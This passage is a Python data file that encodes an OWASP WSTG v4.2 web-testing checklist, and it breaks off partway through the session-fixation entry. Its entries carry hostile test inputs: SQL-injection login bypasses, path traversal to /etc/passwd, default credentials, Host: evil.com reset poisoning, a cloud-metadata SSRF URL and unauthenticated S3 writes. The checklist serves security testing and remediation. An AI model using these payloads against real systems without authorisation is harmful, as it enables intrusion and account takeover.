"""
OWASP WSTG v4.2 Checklist — fully embedded, no internet required.
100+ tests across all categories.
"""

WSTG_TESTS = [
    # ═══════════════════════════════════════════════════
    # INFORMATION GATHERING (WSTG-INFO)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-INFO-01","category":"Information Gathering","name":"Conduct Search Engine Discovery",
     "objective":"Identify sensitive information exposed via search engines",
     "applies_when":["always"],"severity":"low","owasp_top10":["A05:2021"],
     "burp_applicable":False,
     "manual_steps":["Check robots.txt","Google: site:target.com filetype:pdf|xls|doc|bak|sql|conf|env",
                      "Google: site:target.com inurl:admin|backup|config|test|dev",
                      "Check Wayback Machine: web.archive.org","Search Shodan for target IP/domain",
                      "Check GitHub for leaked code/secrets"],
     "payloads":[],"expected_vulnerable":"Sensitive files/paths found in public search",
     "expected_safe":"No sensitive info in public results",
     "remediation":"Remove sensitive files, restrict robots.txt, rotate exposed secrets",
     "h1_pattern_ids":["info_disclosure"]},

    {"id":"WSTG-INFO-02","category":"Information Gathering","name":"Fingerprint Web Server",
     "objective":"Identify web server type, version, OS","applies_when":["always"],
     "severity":"low","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["curl -sI TARGET | grep -i server","nmap -sV -p 80,443 TARGET",
                      "Check error pages for version info","Send invalid HTTP verb: OPTIONS, TRACE",
                      "Check X-Powered-By, X-AspNet-Version headers"],
     "payloads":["OPTIONS / HTTP/1.1","TRACE / HTTP/1.1"],
     "expected_vulnerable":"Server version disclosed in headers/error pages",
     "expected_safe":"Server header removed or generic",
     "remediation":"Remove version from Server header, customize error pages",
     "h1_pattern_ids":["info_disclosure"]},

    {"id":"WSTG-INFO-03","category":"Information Gathering","name":"Review Webserver Metafiles",
     "objective":"Find sensitive info in robots.txt, sitemap.xml, security.txt",
     "applies_when":["always"],"severity":"low","owasp_top10":["A05:2021"],
     "burp_applicable":False,
     "manual_steps":["GET /robots.txt","GET /sitemap.xml","GET /.well-known/security.txt",
                      "GET /.well-known/humans.txt","GET /crossdomain.xml","GET /clientaccesspolicy.xml"],
     "payloads":["/robots.txt","/sitemap.xml","/.well-known/security.txt","/crossdomain.xml"],
     "expected_vulnerable":"Disallowed paths reveal admin/sensitive areas",
     "expected_safe":"robots.txt generic, no sensitive path disclosure",
     "remediation":"Audit robots.txt entries, remove sensitive path hints",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INFO-04","category":"Information Gathering","name":"Enumerate Application Entry Points",
     "objective":"Map all input fields, endpoints, and parameters",
     "applies_when":["always"],"severity":"info","owasp_top10":[],"burp_applicable":True,
     "manual_steps":["Spider entire application with Burp/crawler",
                      "Note all GET/POST params","Identify hidden form fields",
                      "Check JS source for hardcoded endpoints","Review API documentation if available"],
     "payloads":[],"expected_vulnerable":"New undocumented entry points found",
     "expected_safe":"All entry points documented and expected",
     "remediation":"Remove unused endpoints, document all APIs",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INFO-05","category":"Information Gathering","name":"Identify Application Entry Points",
     "objective":"Identify technology stack and frameworks","applies_when":["always"],
     "severity":"info","owasp_top10":[],"burp_applicable":False,
     "manual_steps":["Check response headers for technology hints",
                      "Review cookies (PHPSESSID=PHP, JSESSIONID=Java, ASP.NET=.NET)",
                      "Use Wappalyzer/WhatWeb","Check meta generator tag",
                      "Look for framework-specific paths (/wp-admin, /admin/login)"],
     "payloads":[],"expected_vulnerable":"Outdated/vulnerable tech version identified",
     "expected_safe":"Current patched versions in use",
     "remediation":"Keep all frameworks and CMS up to date",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INFO-06","category":"Information Gathering","name":"Identify Application Entry Points via Code",
     "objective":"Map application endpoints from client-side code",
     "applies_when":["always"],"severity":"info","owasp_top10":[],"burp_applicable":False,
     "manual_steps":["Review all JS files for API endpoints",
                      "Search for fetch('/api/', XMLHttpRequest, axios.get/post",
                      "Check for commented-out code with paths",
                      "Look for .map files (source maps expose original code)"],
     "payloads":[],"expected_vulnerable":"Hidden endpoints or source maps found",
     "expected_safe":"No sensitive endpoint disclosure in JS",
     "remediation":"Remove source maps from production, minify JS",
     "h1_pattern_ids":["js_file_exposure"]},

    {"id":"WSTG-INFO-07","category":"Information Gathering","name":"Map Application Architecture",
     "objective":"Understand network topology, load balancers, CDN, WAF",
     "applies_when":["always"],"severity":"info","owasp_top10":[],"burp_applicable":False,
     "manual_steps":["Identify CDN (Cloudflare, Akamai) via headers",
                      "Detect WAF (ModSecurity, Cloudflare) via responses",
                      "Find real IP behind CDN via DNS history (SecurityTrails)",
                      "Test load balancer: multiple requests, check Server headers"],
     "payloads":[],"expected_vulnerable":"Real IP exposed, WAF bypassable",
     "expected_safe":"Architecture properly obscured","remediation":"Ensure CDN covers all subdomains",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INFO-08","category":"Information Gathering","name":"Fingerprint Web Application Framework",
     "objective":"Identify CMS, framework, and version","applies_when":["always"],
     "severity":"low","owasp_top10":["A06:2021"],"burp_applicable":False,
     "manual_steps":["Check for CMS-specific paths (wp-login.php, /joomla/, /drupal/)",
                      "Review cookie names (wordpress_logged_in, craft_csrf_token)",
                      "Check default admin URL: /admin, /administrator, /wp-admin, /dashboard",
                      "Look for version in meta generator, readme files"],
     "payloads":["/wp-login.php","/administrator/index.php","/user/login","/admin/login"],
     "expected_vulnerable":"Outdated CMS version, default admin path accessible",
     "expected_safe":"Non-default admin path, current version",
     "remediation":"Update CMS, change default admin URL, remove version disclosure",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INFO-09","category":"Information Gathering","name":"Fingerprint Web Application",
     "objective":"Identify all application components","applies_when":["always"],
     "severity":"info","owasp_top10":[],"burp_applicable":False,
     "manual_steps":["Map all subdomains via DNS brute force",
                      "Check for development/staging environments (dev., staging., test.)",
                      "Identify third-party integrations from JS",
                      "Check for exposed API keys in frontend code"],
     "payloads":[],"expected_vulnerable":"Shadow IT, dev environments exposed",
     "expected_safe":"Only production endpoints accessible","remediation":"Restrict non-prod access",
     "h1_pattern_ids":["subdomain_takeover"]},

    {"id":"WSTG-INFO-10","category":"Information Gathering","name":"Map Application Architecture (Cloud)",
     "objective":"Identify cloud storage, services, and misconfigurations",
     "applies_when":["always"],"severity":"medium","owasp_top10":["A05:2021"],
     "burp_applicable":False,
     "manual_steps":["Check for S3 buckets in JS/HTML source",
                      "Test public access: curl https://BUCKETNAME.s3.amazonaws.com/",
                      "Check Azure blob storage, GCP storage references",
                      "Look for cloud metadata URLs in SSRF-prone params"],
     "payloads":["http://169.254.169.254/latest/meta-data/","http://metadata.google.internal/"],
     "expected_vulnerable":"Public S3 bucket, accessible cloud metadata",
     "expected_safe":"All cloud resources private","remediation":"Set bucket ACL to private",
     "h1_pattern_ids":["ssrf","cloud_misconfig"]},

    # ═══════════════════════════════════════════════════
    # CONFIGURATION TESTING (WSTG-CONF)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-CONF-01","category":"Configuration Testing","name":"Network Infrastructure Configuration",
     "objective":"Test network-level security controls","applies_when":["always"],
     "severity":"medium","owasp_top10":["A05:2021"],"burp_applicable":False,
     "manual_steps":["Test all ports: nmap -p- TARGET","Check for unnecessary open ports",
                      "Test firewall rules bypass","Check for internal services exposed"],
     "payloads":[],"expected_vulnerable":"Unnecessary services exposed, firewall bypassable",
     "expected_safe":"Only required ports open","remediation":"Close unnecessary ports, harden firewall",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CONF-02","category":"Configuration Testing","name":"Application Platform Configuration",
     "objective":"Test web server and platform configuration","applies_when":["always"],
     "severity":"medium","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Test TRACE/TRACK method: curl -X TRACE TARGET",
                      "Check for directory listing: GET /images/ or other dirs",
                      "Test default files: /test.php, /info.php, /phpinfo.php",
                      "Check for .git, .svn, .env files",
                      "Test PUT/DELETE methods on web server"],
     "payloads":["/.git/HEAD","/.env","/.env.local","/.env.backup","/phpinfo.php",
                 "/server-status","/server-info","/.DS_Store","/.svn/entries"],
     "expected_vulnerable":"Sensitive files exposed, dangerous HTTP methods enabled",
     "expected_safe":"No sensitive files, only GET/POST allowed",
     "remediation":"Disable TRACE, restrict HTTP methods, remove default files",
     "h1_pattern_ids":["info_disclosure"]},

    {"id":"WSTG-CONF-03","category":"Configuration Testing","name":"File Extension Handling",
     "objective":"Test how server handles different file extensions",
     "applies_when":["always"],"severity":"medium","owasp_top10":["A05:2021"],
     "burp_applicable":True,
     "manual_steps":["Test file extension bypass: file.php.jpg, file.php%00.jpg",
                      "Check for backup file exposure: index.php.bak, index.php~",
                      "Test .htaccess exposure","Test configuration file exposure"],
     "payloads":["/index.php.bak","/index.php~","/web.config.bak","/.htaccess",
                 "/config.php.bak","/database.yml"],
     "expected_vulnerable":"Backup/config files exposed with source code",
     "expected_safe":"No file extension bypass possible","remediation":"Restrict file access by extension",
     "h1_pattern_ids":["info_disclosure"]},

    {"id":"WSTG-CONF-04","category":"Configuration Testing","name":"Backup and Unreferenced Files",
     "objective":"Find backup and unreferenced files","applies_when":["always"],
     "severity":"high","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Brute force common backup names: admin.php.bak, config.bak",
                      "Check for editor temp files: index.php~, .index.php.swp",
                      "Search for common config files: config.yml, settings.py, appsettings.json",
                      "Check for database dumps: dump.sql, backup.sql, db.sql"],
     "payloads":["/backup.sql","/dump.sql","/db.sql","/database.sql","/config.bak",
                 "/wp-config.php.bak","/.env.production","/.env.staging"],
     "expected_vulnerable":"Database dump or config file with credentials exposed",
     "expected_safe":"No backup files accessible","remediation":"Remove all backup/temp files from webroot",
     "h1_pattern_ids":["info_disclosure"]},

    {"id":"WSTG-CONF-05","category":"Configuration Testing","name":"Enumerate Infrastructure and Application Admin Interfaces",
     "objective":"Find admin panels and management interfaces","applies_when":["always"],
     "severity":"medium","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Test common admin paths: /admin, /administrator, /manage, /dashboard",
                      "Check for phpMyAdmin: /phpmyadmin, /pma, /mysql",
                      "Test Tomcat manager: /manager/html",
                      "Check Jenkins, GitLab, monitoring tools"],
     "payloads":["/admin","/administrator","/admin/login","/manage","/management",
                 "/phpmyadmin","/pma","/manager/html","/console","/jenkins","/actuator"],
     "expected_vulnerable":"Admin interface accessible without proper auth",
     "expected_safe":"Admin interface restricted by IP or strong auth",
     "remediation":"Restrict admin access by IP, enable MFA","h1_pattern_ids":["admin_exposure"]},

    {"id":"WSTG-CONF-06","category":"Configuration Testing","name":"HTTP Methods",
     "objective":"Test all HTTP methods for unauthorized access","applies_when":["always"],
     "severity":"medium","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["OPTIONS request to list allowed methods",
                      "Test PUT: create test file",
                      "Test DELETE: delete a resource",
                      "Test TRACE: check for XST vulnerability"],
     "payloads":["OPTIONS * HTTP/1.1","TRACE / HTTP/1.1","PUT /test.txt HTTP/1.1"],
     "expected_vulnerable":"PUT/DELETE/TRACE enabled on web server",
     "expected_safe":"Only GET/POST allowed","remediation":"Disable unused HTTP methods in server config",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CONF-07","category":"Configuration Testing","name":"HTTP Strict Transport Security",
     "objective":"Verify HSTS implementation","applies_when":["always"],
     "severity":"low","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Check for Strict-Transport-Security header",
                      "Verify max-age is >= 31536000 (1 year)",
                      "Check includeSubDomains flag",
                      "Test HTTP redirect to HTTPS"],
     "payloads":[],"expected_vulnerable":"HSTS header missing, HTTP not redirecting to HTTPS",
     "expected_safe":"HSTS with long max-age including subdomains",
     "remediation":"Add HSTS header with max-age=31536000; includeSubDomains; preload",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CONF-08","category":"Configuration Testing","name":"RIA Cross Domain Policy",
     "objective":"Test cross-domain policy files","applies_when":["always"],
     "severity":"medium","owasp_top10":["A05:2021"],"burp_applicable":False,
     "manual_steps":["GET /crossdomain.xml","GET /clientaccesspolicy.xml",
                      "Check for wildcard (*) in domain policy"],
     "payloads":["/crossdomain.xml","/clientaccesspolicy.xml"],
     "expected_vulnerable":"allow-access-from domain='*' found",
     "expected_safe":"Restrictive cross-domain policy or not present",
     "remediation":"Remove or restrict crossdomain.xml","h1_pattern_ids":[]},

    {"id":"WSTG-CONF-09","category":"Configuration Testing","name":"File Permission",
     "objective":"Test file and directory permissions","applies_when":["always"],
     "severity":"medium","owasp_top10":["A01:2021"],"burp_applicable":False,
     "manual_steps":["Check for directory listing enabled",
                      "Test access to parent directories (path traversal)",
                      "Check upload directory permissions","Test config file permissions"],
     "payloads":["/../../../etc/passwd","/uploads/../../../etc/passwd"],
     "expected_vulnerable":"Directory listing or path traversal possible",
     "expected_safe":"Directory listing disabled, no path traversal","remediation":"Disable directory listing",
     "h1_pattern_ids":["path_traversal"]},

    {"id":"WSTG-CONF-10","category":"Configuration Testing","name":"Subdomain Takeover",
     "objective":"Test for subdomain takeover vulnerabilities","applies_when":["always"],
     "severity":"high","owasp_top10":["A05:2021"],"burp_applicable":False,
     "manual_steps":["Enumerate subdomains via DNS","Check for CNAME to unclaimed services",
                      "Test: Heroku, GitHub Pages, S3, Azure, Netlify",
                      "Look for NXDOMAIN on CNAME targets"],
     "payloads":[],"expected_vulnerable":"CNAME points to unclaimed/expired service",
     "expected_safe":"All DNS records point to active services",
     "remediation":"Remove dangling DNS records","h1_pattern_ids":["subdomain_takeover"]},

    {"id":"WSTG-CONF-11","category":"Configuration Testing","name":"Cloud Storage",
     "objective":"Test cloud storage misconfigurations","applies_when":["always"],
     "severity":"high","owasp_top10":["A05:2021"],"burp_applicable":False,
     "manual_steps":["Find S3 bucket names from JS/HTML",
                      "Test public read: aws s3 ls s3://BUCKET --no-sign-request",
                      "Test public write: aws s3 cp test.txt s3://BUCKET/ --no-sign-request",
                      "Check Azure blob: https://ACCOUNT.blob.core.windows.net/CONTAINER/"],
     "payloads":[],"expected_vulnerable":"Public read/write on cloud storage",
     "expected_safe":"All buckets private with proper ACLs",
     "remediation":"Set bucket ACL to private, enable CloudTrail logging",
     "h1_pattern_ids":["cloud_misconfig"]},

    {"id":"WSTG-CONF-12","category":"Configuration Testing","name":"Content Security Policy",
     "objective":"Evaluate CSP header implementation","applies_when":["always"],
     "severity":"low","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Check Content-Security-Policy header","Look for unsafe-inline, unsafe-eval",
                      "Check for wildcard sources (*)","Test CSP bypass via allowed domains"],
     "payloads":[],"expected_vulnerable":"CSP missing or has unsafe-inline/unsafe-eval",
     "expected_safe":"Strict CSP with no unsafe directives",
     "remediation":"Implement strict CSP, avoid unsafe-inline","h1_pattern_ids":[]},

    # ═══════════════════════════════════════════════════
    # IDENTITY MANAGEMENT (WSTG-IDNT)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-IDNT-01","category":"Identity Management","name":"Test Role Definitions",
     "objective":"Verify role-based access controls are properly defined",
     "applies_when":["has_login"],"severity":"high","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Map all user roles in application","Test access to admin functions as regular user",
                      "Test horizontal privilege escalation (access other user's data)",
                      "Check if role is stored client-side (cookie, localStorage)"],
     "payloads":[],"expected_vulnerable":"Regular user can access admin functions",
     "expected_safe":"Strict role enforcement server-side","remediation":"Implement server-side RBAC",
     "h1_pattern_ids":["privilege_escalation","idor_numeric_id"]},

    {"id":"WSTG-IDNT-02","category":"Identity Management","name":"Test User Registration Process",
     "objective":"Test user registration for weaknesses","applies_when":["has_login"],
     "severity":"medium","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Register with admin email if guessable","Test for username enumeration",
                      "Check email verification bypass","Test account verification token weakness",
                      "Register with special characters in username"],
     "payloads":["admin@target.com","admin+test@target.com","' OR '1'='1"],
     "expected_vulnerable":"Admin account registration possible, weak verification",
     "expected_safe":"Proper email verification, no admin self-registration",
     "remediation":"Implement email verification, restrict admin account creation",
     "h1_pattern_ids":["account_takeover"]},

    {"id":"WSTG-IDNT-03","category":"Identity Management","name":"Test Account Provisioning Process",
     "objective":"Test account provisioning for unauthorized access",
     "applies_when":["has_login"],"severity":"medium","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Test if users can provision accounts for others",
                      "Check for mass account creation",
                      "Test account deprovisioning: revoked users still active?"],
     "payloads":[],"expected_vulnerable":"Unauthorized account provisioning possible",
     "expected_safe":"Account provisioning restricted to admins",
     "remediation":"Restrict account provisioning APIs","h1_pattern_ids":[]},

    {"id":"WSTG-IDNT-04","category":"Identity Management","name":"Test Account Enumeration",
     "objective":"Test if valid usernames can be enumerated",
     "applies_when":["has_login"],"severity":"medium","owasp_top10":["A07:2021"],
     "burp_applicable":True,
     "manual_steps":["Test login with valid vs invalid username — different response?",
                      "Test password reset — different response for valid vs invalid user?",
                      "Check response time differences","Check for user enumeration in registration"],
     "payloads":["admin","administrator","root","test","user","info","support"],
     "expected_vulnerable":"Different response/timing for valid vs invalid users",
     "expected_safe":"Generic 'invalid credentials' for both cases",
     "remediation":"Return identical response regardless of username validity",
     "h1_pattern_ids":["username_enumeration"]},

    {"id":"WSTG-IDNT-05","category":"Identity Management","name":"Test Permissions of Guest/Training Accounts",
     "objective":"Test if guest/demo accounts have excessive permissions",
     "applies_when":["has_login"],"severity":"medium","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Login with guest/demo credentials if any","Test guest access to other users' data",
                      "Check guest can't modify data or settings"],
     "payloads":[],"expected_vulnerable":"Guest accounts with excessive permissions",
     "expected_safe":"Minimal permissions for guest accounts",
     "remediation":"Apply principle of least privilege","h1_pattern_ids":[]},

    # ═══════════════════════════════════════════════════
    # AUTHENTICATION TESTING (WSTG-ATHN)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-ATHN-01","category":"Authentication Testing","name":"Test Credentials Transported over Encrypted Channel",
     "objective":"Ensure credentials never transmitted over HTTP",
     "applies_when":["has_login"],"severity":"high","owasp_top10":["A02:2021"],
     "burp_applicable":True,
     "manual_steps":["Submit login form over HTTP (not HTTPS)",
                      "Check if login page forces HTTPS",
                      "Intercept login request — is it HTTPS?",
                      "Check for mixed content on login page"],
     "payloads":[],"expected_vulnerable":"Login form submits over HTTP",
     "expected_safe":"Login always over HTTPS with proper redirect",
     "remediation":"Force HTTPS for all pages, especially login","h1_pattern_ids":[]},

    {"id":"WSTG-ATHN-02","category":"Authentication Testing","name":"Test Default Credentials",
     "objective":"Test for default username/password combinations",
     "applies_when":["has_login"],"severity":"critical","owasp_top10":["A07:2021"],
     "burp_applicable":True,
     "manual_steps":["Try admin/admin, admin/password, admin/admin123",
                      "Try root/root, root/toor","Try guest/guest","Try application-specific defaults",
                      "Check vendor documentation for default creds"],
     "payloads":["admin:admin","admin:password","admin:admin123","root:root",
                 "administrator:administrator","test:test","user:user"],
     "expected_vulnerable":"Login with default credentials succeeds",
     "expected_safe":"Default credentials changed, account locked after attempts",
     "remediation":"Force credential change on first login","h1_pattern_ids":[]},

    {"id":"WSTG-ATHN-03","category":"Authentication Testing","name":"Test Account Lockout Mechanism",
     "objective":"Test brute force protection","applies_when":["has_login"],
     "severity":"medium","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Attempt 10+ failed logins with same account",
                      "Check if account locks or CAPTCHA appears",
                      "Test lockout bypass: change IP, X-Forwarded-For header",
                      "Check if lockout is persistent or time-based"],
     "payloads":["X-Forwarded-For: 127.0.0.1","X-Real-IP: 1.2.3.4","X-Originating-IP: 127.0.0.1"],
     "expected_vulnerable":"No lockout after multiple failed attempts",
     "expected_safe":"Account locked or CAPTCHA after 5-10 failures",
     "remediation":"Implement account lockout with exponential backoff",
     "h1_pattern_ids":["brute_force"]},

    {"id":"WSTG-ATHN-04","category":"Authentication Testing","name":"Test Bypassing Authentication Schema",
     "objective":"Test for authentication bypass vulnerabilities",
     "applies_when":["has_login"],"severity":"critical","owasp_top10":["A07:2021"],
     "burp_applicable":True,
     "manual_steps":["Try accessing authenticated pages directly (no session)",
                      "Test parameter manipulation: ?admin=true, ?authenticated=1",
                      "Test cookie manipulation: change user ID in cookie",
                      "Try SQL injection in login: admin'--",
                      "Test forced browsing to protected resources"],
     "payloads":["admin'--","admin' OR '1'='1","' OR 1=1--","') OR ('1'='1",
                 "admin'/*","1' OR '1' = '1"],
     "expected_vulnerable":"Authentication bypassed via SQLi or parameter manipulation",
     "expected_safe":"All authentication bypass attempts blocked",
     "remediation":"Use parameterized queries, server-side auth validation",
     "h1_pattern_ids":["auth_bypass","sqli"]},

    {"id":"WSTG-ATHN-05","category":"Authentication Testing","name":"Test Vulnerable Remember Password",
     "objective":"Test 'remember me' functionality security",
     "applies_when":["has_login"],"severity":"medium","owasp_top10":["A07:2021"],
     "burp_applicable":True,
     "manual_steps":["Enable 'remember me' and capture cookie",
                      "Analyze cookie: is it encrypted? Does it contain credentials?",
                      "Test if cookie works after password change",
                      "Check cookie expiry duration (should not be indefinite)"],
     "payloads":[],"expected_vulnerable":"Remember me cookie contains plaintext credentials",
     "expected_safe":"Secure token-based remember me, invalidated on password change",
     "remediation":"Use secure random tokens, not credentials in cookies",
     "h1_pattern_ids":[]},

    {"id":"WSTG-ATHN-06","category":"Authentication Testing","name":"Test Browser Cache for Sensitive Information",
     "objective":"Test if sensitive pages cached by browser",
     "applies_when":["has_login"],"severity":"low","owasp_top10":["A02:2021"],
     "burp_applicable":True,
     "manual_steps":["Check Cache-Control header on authenticated pages",
                      "Check Pragma: no-cache header","Test: logout then hit back button",
                      "Check if sensitive data in page source after logout"],
     "payloads":[],"expected_vulnerable":"Authenticated pages cached, accessible after logout",
     "expected_safe":"Cache-Control: no-store on all sensitive pages",
     "remediation":"Add Cache-Control: no-store, no-cache headers","h1_pattern_ids":[]},

    {"id":"WSTG-ATHN-07","category":"Authentication Testing","name":"Test Password Policy",
     "objective":"Test password strength requirements","applies_when":["has_login"],
     "severity":"medium","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Try setting password: '123', 'password', 'a'",
                      "Check minimum length requirement","Check complexity requirements",
                      "Test if common passwords blocked","Check password history enforcement"],
     "payloads":["123","password","abc","1","123456"],
     "expected_vulnerable":"Weak passwords accepted (under 8 chars, no complexity)",
     "expected_safe":"Minimum 12 chars with complexity, common passwords blocked",
     "remediation":"Enforce strong password policy, integrate HIBP API","h1_pattern_ids":[]},

    {"id":"WSTG-ATHN-08","category":"Authentication Testing","name":"Test Password Reset Mechanism",
     "objective":"Test password reset flow for weaknesses","applies_when":["has_login"],
     "severity":"high","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Test reset token strength (should be cryptographically random)",
                      "Check reset token expiry","Test token reuse after password reset",
                      "Try guessing/brute forcing reset token",
                      "Test host header injection in reset email",
                      "Check if reset link sent to attacker email for victim account"],
     "payloads":["Host: evil.com","X-Forwarded-Host: evil.com","X-Forwarded-For: evil.com"],
     "expected_vulnerable":"Weak/predictable token, host header injection, no expiry",
     "expected_safe":"Cryptographic token, 15-min expiry, single-use",
     "remediation":"Use crypto.randomBytes(32) for tokens, set short expiry",
     "h1_pattern_ids":["password_reset","account_takeover"]},

    {"id":"WSTG-ATHN-09","category":"Authentication Testing","name":"Test Weaker Authentication in Alternative Channel",
     "objective":"Test mobile/API/alternate auth channels","applies_when":["has_login","has_api"],
     "severity":"high","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Test if API has weaker auth than web UI",
                      "Check mobile app API endpoints directly",
                      "Test GraphQL auth vs REST auth",
                      "Check if WebSocket auth is enforced"],
     "payloads":[],"expected_vulnerable":"API has weaker auth, mobile endpoints unprotected",
     "expected_safe":"Consistent auth across all channels",
     "remediation":"Enforce consistent auth on all endpoints","h1_pattern_ids":[]},

    {"id":"WSTG-ATHN-10","category":"Authentication Testing","name":"Test Multi-Factor Authentication",
     "objective":"Test MFA implementation for bypasses","applies_when":["has_login"],
     "severity":"high","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Test MFA code brute force (no lockout?)",
                      "Test if MFA can be bypassed by direct URL access after step 1",
                      "Test backup code security","Check if MFA enforced on all auth methods",
                      "Test race condition: submit MFA twice simultaneously"],
     "payloads":["000000","123456","111111","999999"],
     "expected_vulnerable":"MFA bypass via URL manipulation or brute force",
     "expected_safe":"MFA required, lockout after failures, no bypass possible",
     "remediation":"Implement rate limiting on MFA, enforce MFA on all channels",
     "h1_pattern_ids":["2fa_bypass"]},

    # ═══════════════════════════════════════════════════
    # AUTHORIZATION TESTING (WSTG-AUTHZ)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-AUTHZ-01","category":"Authorization Testing","name":"Test Directory Traversal",
     "objective":"Test path traversal vulnerabilities","applies_when":["always"],
     "severity":"high","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Test file parameter: ?file=../../../etc/passwd",
                      "Test URL path: /files/../../admin/config",
                      "Try URL encoding: %2e%2e%2f, %2e%2e/",
                      "Try double encoding: %252e%252e%252f",
                      "Test on Windows: ..\\..\\..\\windows\\win.ini"],
     "payloads":["../../../etc/passwd","..%2f..%2f..%2fetc%2fpasswd",
                 "....//....//....//etc/passwd","..\\..\\..\\windows\\win.ini",
                 "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],
     "expected_vulnerable":"Server file content returned (passwd, win.ini, etc.)",
     "expected_safe":"Path traversal blocked with 400/403",
     "remediation":"Validate file paths against allowlist, use basename()",
     "h1_pattern_ids":["path_traversal","lfi"]},

    {"id":"WSTG-AUTHZ-02","category":"Authorization Testing","name":"Test Bypassing Authorization Schema",
     "objective":"Test authorization bypass via parameter manipulation",
     "applies_when":["has_login"],"severity":"critical","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Change user ID in URL/body to another user's ID",
                      "Test horizontal: /api/users/YOUR_ID → /api/users/OTHER_ID",
                      "Test vertical: /admin/users while logged in as regular user",
                      "Test UUID enumeration (sequential or predictable UUIDs)",
                      "Test parameter pollution: ?role=admin added to request"],
     "payloads":[],"expected_vulnerable":"Access to other users' data or admin functions",
     "expected_safe":"Authorization enforced server-side, 403 for unauthorized access",
     "remediation":"Implement RBAC, verify ownership server-side on every request",
     "h1_pattern_ids":["idor_numeric_id","idor_uuid","privilege_escalation"]},

    {"id":"WSTG-AUTHZ-03","category":"Authorization Testing","name":"Test Privilege Escalation",
     "objective":"Test for vertical privilege escalation","applies_when":["has_login"],
     "severity":"critical","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Modify role/admin parameter in request",
                      "Test mass assignment: add 'role':'admin' to profile update",
                      "Check if user can set their own permissions via API",
                      "Test JWT role claim manipulation"],
     "payloads":['{"role":"admin"}','{"is_admin":true}','{"privilege":"superuser"}'],
     "expected_vulnerable":"Role escalated via parameter manipulation",
     "expected_safe":"Server ignores client-supplied role parameters",
     "remediation":"Implement server-side role assignment, block client role claims",
     "h1_pattern_ids":["privilege_escalation","mass_assignment"]},

    {"id":"WSTG-AUTHZ-04","category":"Authorization Testing","name":"Test Insecure Direct Object References",
     "objective":"Test IDOR vulnerabilities across all resources",
     "applies_when":["has_login"],"severity":"high","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Find any endpoint with numeric/predictable ID",
                      "Log in as user A and get your resource ID",
                      "Log in as user B and try accessing user A's resource",
                      "Test: GET /api/orders/1337 → try /api/orders/1338",
                      "Test file download: GET /files/invoice_001.pdf → try invoice_002.pdf"],
     "payloads":[],"expected_vulnerable":"Access to other user resources (IDOR confirmed)",
     "expected_safe":"403 when accessing another user's resources",
     "remediation":"Use authorization check on every resource access, use indirect references",
     "h1_pattern_ids":["idor_numeric_id","idor_uuid"]},

    # ═══════════════════════════════════════════════════
    # SESSION MANAGEMENT (WSTG-SESS)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-SESS-01","category":"Session Management","name":"Test Session Management Schema",
     "objective":"Analyze session token generation and management",
     "applies_when":["has_login"],"severity":"high","owasp_top10":["A07:2021"],
     "burp_applicable":True,
     "manual_steps":["Capture 20+ session tokens, analyze for patterns",
                      "Check token entropy (should be 128+ bits)",
                      "Test if token changes after login (session fixation)",
                      "Check secure/HttpOnly flags on session cookie",
                      "Test if token works after logout"],
     "payloads":[],"expected_vulnerable":"Predictable tokens, no Secure/HttpOnly flags",
     "expected_safe":"Cryptographically random tokens with proper flags",
     "remediation":"Use framework's session management, set Secure;HttpOnly;SameSite flags",
     "h1_pattern_ids":[]},

    {"id":"WSTG-SESS-02","category":"Session Management","name":"Test Cookie Attributes",
     "objective":"Test cookie security attributes","applies_when":["always"],
     "severity":"medium","owasp_top10":["A02:2021"],"burp_applicable":True,
     "manual_steps":["Check Set-Cookie header for Secure flag",
                      "Check HttpOnly flag (prevents JS access)",
                      "Check SameSite attribute (Strict/Lax/None)",
                      "Check Domain and Path scope",
                      "Check expiry (too long = risk)"],
     "payloads":[],"expected_vulnerable":"Session cookie missing Secure/HttpOnly/SameSite",
     "expected_safe":"All session cookies have Secure;HttpOnly;SameSite=Strict",
     "remediation":"Set all three flags: Secure;HttpOnly;SameSite=Lax (minimum)",
     "h1_pattern_ids":[]},

    {"id":"WSTG-SESS-03","category":"Session Management","name":"Test Session Fixation",
     "objective":"Test if session ID changes after authentication",
     "applies_when":["has_login"],"severity":"high","owasp_top10":["A07:2021"],
     "burp_applicable":True,
     "manual_steps":["Get session ID before login","Login to application",
                      "Check if session ID changed after login",
                      "Test: set session ID in URL parameter, login, check if same ID used"],
     "payloads":["?sessionid=ATTACKER_VALUE","?PHPSESSID=ATTACKER_VALUE"],
